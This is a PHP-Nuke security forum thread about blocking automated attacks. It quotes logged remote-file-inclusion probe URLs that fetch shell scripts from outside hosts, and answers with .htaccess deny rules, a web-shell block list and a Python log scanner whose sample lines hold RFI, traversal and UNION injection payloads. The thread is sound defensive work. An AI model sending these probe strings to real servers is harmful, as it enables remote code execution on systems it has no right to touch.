Ravens PHP Scripts: Forums

Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Guardian2003
Site Admin


Joined: Aug 28, 2003
Posts: 6792
Location: Ha Noi, Viet Nam

Posted: Tue Feb 21, 2006 3:55 am

Perhaps some have seen my statement "Probably the most secure version of nuke ever" on my site and thought I was issuing a challenge.
The following attempts have been tried (for modules which do not exist):
Code:
modules/Forums/admin/admin_styles.php?phpbb_root_path=http://saudia.100free.com/asc.txt?&cmd=uname%20-a;id

Code:
/modules/4nAlbum/public/displayCategory.php?basepath=http://www.lilspage.de/modules/tool25.dat?cmd=id

Quote:
www.code-authors.com/index.php?cat=http://www.lilspage.de/modules/tool25.dat?cmd=id

Quote:
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.lilspage.de/modules/tool25.dat?cmd=id

Quote:
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.clan-ff.net/vwar/tool25.dat?&cmd=id


These are quite obviously some sort of automated attack and, needless to say, they didn't work, but what would be the best way to block such attacks?
 
djmaze
Subject Matter Expert


Joined: May 15, 2004
Posts: 719
Location: http://tinyurl.com/5z8dmv

Posted: Tue Feb 21, 2006 7:21 am

Code:
# The pattern is a regex: a leading "=" would make it a plain-string comparison,
# which only matches when the whole query string equals "http://".
RewriteCond %{QUERY_STRING} http:// [NC]
RewriteRule ^.*$ - [F]
 
Guardian2003
Posted: Tue Feb 21, 2006 7:39 am

Interesting - thanks for that, I'll try it and see what develops.
 
djmaze
Posted: Tue Feb 21, 2006 8:06 am

Here's an even better version that also denies ../../ as seen in rush attacks (for example an exploit in file=../../.htaccess) and another for UNION:
Code:
# Patterns are regexes: "=" would demand equality with the whole query string,
# so it is dropped and the dots in ../ are escaped.  %{QUERY_STRING} is matched
# raw (not URL-decoded), which is why the UNION pattern carries the %20.
RewriteCond %{QUERY_STRING} \.\./ [NC,OR]
RewriteCond %{QUERY_STRING} "%20UNION" [NC,OR]
RewriteCond %{QUERY_STRING} http:// [NC]
RewriteRule ^.*$ - [F]

NOTE: this will NOT make you 100% safe, since phpnuke uses register_globals, so an attack can also be made through POST and COOKIE.
 
Guardian2003
Posted: Tue Feb 21, 2006 8:59 am

Thanks!!
 
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

Posted: Tue Feb 21, 2006 9:08 am

admin_styles.php is a known attack that has hit phpBB systems (and those using phpBB derivatives) several times.

Ditto 4nAlbum and My_eGallery using the same displayCategory.php

The attack on index.php is nothing I have seen. Must have been a "cat" variable vulnerable somewhere.

Does Sentinel not block these attacks?

---

For my site not using Sentinel, here's what I have right now:
using DisError to capture the 404 messages and read the 'REDIRECT_URL'.
If it includes anything like 'xmlrpc.php', 'awstats.pl', 'displayCategory.php' or 'upgrade_album.php',
they get banned.

Guardian2003
Posted: Tue Feb 21, 2006 9:52 am

evaders - with the exception of the third quote (above), none tripped Sentinel, but that is probably due to my sloppy blocker configuration, which I'm looking at right now.
 
spasticdonkey
RavenNuke(tm) Development Team


Joined: Dec 02, 2006
Posts: 1692
Location: Texas, USA

Posted: Wed Feb 18, 2009 12:57 am

djmaze wrote:
Here's an even better version that also denies ../../ as seen in rush attacks (for example an exploit in file=../../.htaccess) and another for UNION:

# Patterns are regexes: "=" would demand equality with the whole query string,
# so it is dropped and the dots in ../ are escaped.
RewriteCond %{QUERY_STRING} \.\./ [NC,OR]
RewriteCond %{QUERY_STRING} "%20UNION" [NC,OR]
RewriteCond %{QUERY_STRING} http:// [NC]
RewriteRule ^.*$ - [F]

NOTE: this will NOT make you 100% safe, since phpnuke uses register_globals, so an attack can also be made through POST and COOKIE.


I know this has come up several times here and there, but a lot of the posts are years old... I wondered if there were some up-to-date recommendations for additional security via htaccess? I've used these for some time, and my Sentinel emails decreased dramatically after adding them.
Code:
RewriteCond %{HTTP_USER_AGENT} ^libwww [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
# The server variable on the next six lines was lost when the post was rendered;
# %{QUERY_STRING} is assumed here, as these are query-string signatures.
RewriteCond %{QUERY_STRING} _CONF [OR]
RewriteCond %{QUERY_STRING} tool25 [OR]
RewriteCond %{QUERY_STRING} cmd\.txt [OR]
RewriteCond %{QUERY_STRING} r57shell [OR]
RewriteCond %{QUERY_STRING} c99 [OR]
# No [OR] on the last condition: a trailing [OR] leaves no condition that can
# fail, so the rule would fire for every request.
RewriteCond %{QUERY_STRING} THEME_DIR
RewriteRule ^.* - [F,L]

RewriteCond %{QUERY_STRING} http://
RewriteRule ^.* - [F]


I believe I was told the http one would break some admin functions such as verify downloads and weblinks, but I never tried... but it will also stop a lot of cross site scripting attacks...

Just thought I would toss it out there, food for thought.
 
evaders99
Posted: Wed Feb 18, 2009 1:09 am

phpNuke does pass http through some functions, mostly redirects. But otherwise, it is good to use.
 
slackervaara
Worker


Joined: Aug 26, 2007
Posts: 236

Posted: Wed Feb 18, 2009 9:57 pm

I also use this line:

Code:
RewriteCond %{THE_REQUEST} .*http%3A%2F%2F.* [OR]
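As an added example (not code from this thread, from RavenNuke or from Sentinel), the script below applies the same signatures as djmaze's and spasticdonkey's RewriteCond lines, plus the user-agent checks, to Apache combined-format access log lines, in the spirit of evaders99's REDIRECT_URL check on 404s. Two points the rewrite rules alone do not show: the query string is URL-decoded before matching, so the encoded http%3A%2F%2F form that slackervaara's THE_REQUEST line targets trips the same check as a literal http://; and it lists POSTs to scripts that were already probed by a flagged GET, because a QUERY_STRING condition never sees a POST body or a cookie (the register_globals caveat). The log lines, addresses and hostnames are constructed, and the _CONF/THEME_DIR signatures are assumed to be query-string patterns, since their variable was missing from the post.

```python
"""Access-log scanner for the RFI / traversal / UNION probes from the thread.
Added example; not code from the thread or from RavenNuke.  SAMPLE_LOG is
constructed (reserved example addresses and hostnames)."""
import re
from urllib.parse import unquote, urlsplit

# Query-string signatures lifted from the thread's RewriteCond lines, used as
# regexes.  Apache matches %{QUERY_STRING} raw; here the query is URL-decoded
# first, so "http%3A%2F%2F" (the THE_REQUEST variant in the last post) trips
# the same "remote_url" check as a literal "http://".
QUERY_PATTERNS = {
    "remote_url": re.compile(r"https?://", re.I),          # http:// rule, [NC]
    "traversal": re.compile(r"\.\./"),                     # ../ rule
    "sql_union": re.compile(r"\bUNION\b", re.I),           # %20UNION rule
    "known_shell": re.compile(r"tool25|cmd\.txt|r57shell|c99", re.I),
    "nuke_globals": re.compile(r"_CONF|THEME_DIR"),        # assumed query-string rules
}
# User-agent signatures from the first two lines of spasticdonkey's block.
UA_PATTERN = re.compile(r"^libwww|Indy Library", re.I)

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def classify(line):
    """Parse one combined-format line; return a record with the signatures it
    trips, or None when the line does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m["target"])
    query = unquote(parts.query)  # one decoding pass, as a typical WAF rule does
    hits = [name for name, pat in QUERY_PATTERNS.items() if pat.search(query)]
    if UA_PATTERN.search(m["ua"]):
        hits.append("scanner_ua")
    return {"ip": m["ip"], "method": m["method"], "path": parts.path,
            "status": int(m["status"]), "hits": hits}


def scan(lines):
    """Records for the lines that tripped at least one signature."""
    flagged = []
    for line in lines:
        rec = classify(line)
        if rec and rec["hits"]:
            flagged.append(rec)
    return flagged


def post_blind_spots(lines):
    """Paths that took a POST and were also hit by a flagged GET.  A
    QUERY_STRING RewriteCond never sees a POST body or a cookie (the
    register_globals caveat), so these requests need a look in the
    application's own log, not in .htaccess."""
    probed = {rec["path"] for rec in scan(lines) if rec["method"] == "GET"}
    posted = set()
    for line in lines:
        rec = classify(line)
        if rec and rec["method"] == "POST" and rec["path"] in probed:
            posted.add(rec["path"])
    return sorted(posted)


# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Feb/2006:03:50:01 -0600] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://attacker.example/tool25.dat?&cmd=id HTTP/1.0" 404 512 "-" "libwww-perl/5.805"',
    '203.0.113.5 - - [21/Feb/2006:03:50:02 -0600] "GET /modules.php?name=Downloads&file=../../.htaccess HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [21/Feb/2006:03:51:10 -0600] "GET /modules.php?name=News&sid=1%20UNION%20SELECT%201 HTTP/1.1" 200 800 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [21/Feb/2006:03:51:11 -0600] "GET /index.php?cat=http%3A%2F%2Fattacker.example%2Fshell.txt HTTP/1.1" 200 800 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [21/Feb/2006:03:52:00 -0600] "GET /modules.php?name=Web_Links&l_op=visit&lid=3 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [21/Feb/2006:03:52:05 -0600] "POST /modules/My_eGallery/public/displayCategory.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    'garbage line that is not in combined format',
]

if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(f'{rec["ip"]} {rec["method"]} {rec["path"]} -> {", ".join(rec["hits"])}')
    print("POSTs to probed scripts:", post_blind_spots(SAMPLE_LOG))
```

The decode-before-match step is the reason the encoded variant needs no separate rule here, whereas in .htaccess it does; conversely, a POST to a script that was just probed is the case no rewrite condition on the query string can decide, which is what the last function surfaces.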
 
Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 